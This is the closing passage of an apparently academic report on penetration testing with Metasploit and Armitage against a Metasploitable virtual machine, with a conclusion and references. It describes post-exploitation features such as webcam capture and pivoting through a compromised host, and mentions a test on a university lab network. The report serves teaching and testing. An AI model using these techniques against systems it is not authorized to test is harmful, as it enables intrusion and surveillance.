processes, take a screenshot if applicable or even access a web cam on the machine to take a
picture. Clicking on Post Modules will show other payloads that can be delivered with the
current session. These will show up in the left hand of Armitage under the module database
section. Figure 4.35 shows the list for this particular machine.
Some of the other options are interacting by using a shell and pivoting which allows the
user to make this machine a pivot point of access in the network. With multiple machines on the
network this would allow the user to attempt to use the privileges that are currently accessed in
order to gain access to other machines.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 64
Fall 2011
Figure 4.35 – List of post modules for Metasploitable machine.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 65
Fall 2011
5. Conclusion
The Metasploit Framework is a useful tool in checking vulnerabilities on the network. It
works quite well with Armitage when used on Rapid7’s Metasploitable Virtual Machine.
However a real world test was unsuccessful when Armitage and Metasploit were used on the
FGCU Computer Science Lab Network. The assumption is that there are no known
vulnerabilities on this network.
The virtualized test with Metsploitable and Armitage yielded success. This was a test that
was expected to work and was only used to show the capabilities of Metasploit used in unison
with Armitage. This successful test shows that the frameworks work together and that future
attempts may follow this project in order to enhance the functionality of exploits.
The ability to keep track of information that is found by the Metasploit Framework is not
available in the free version that was used in this project. However, a commercial version is
available that has an extensive database to store previously found exploits and vulnerabilities for
the tester to refer back to. An excellent edition to this project would be to use these tools in order
to further detect currently unseen and untested vulnerabilities. The commercial version can be
found from Rapid7’s Metasploit website. The activation is done through email and purchase can
be done online. [4]
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 66
Fall 2011
6. References
[1] Metasploit, September, 2011 URL: http://www.metasploit.com/
[2] Virtual Box, September, 2011 URL: http://www.vitrualbox.org/
[3] Virtual Box Downloads, September, 2011 URL: http://www.vitrualbox.org/wiki/Downloads/
[4] Metasploit, September, 2011 URL: http://www.metasploit.com/download/
[5] D. Maynor, K.K. Mookhey; Metasploit Toolkit: For Penetration Testing, Exploit
Development, and Vulnerability Research, Syngress Publishing, Inc., Burlington, MA, 2007
[6] D. Kennedy, J. O’Gorman, D. Kearns, and M. Aharoni, Metasploit: The Penetration Testers
Guide, No Starch Press, Inc., San Francisco, CA, 2011
[7] Metasploitable Image, September, 2011 URL:
http://updates.metasploit.com/data/Metasploitable.zip.torrent
[8] Ultimate LAMP Image, September, 2011 URL:
http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip
[9] Ubuntu 11.10 Image, September, 2011 URL: http://www.ubuntu.com/start-
download?distro=desktop&bits=32&release=latest
[10] Armitage, November, 2011 URL: http://www.fastandeasyhacking.com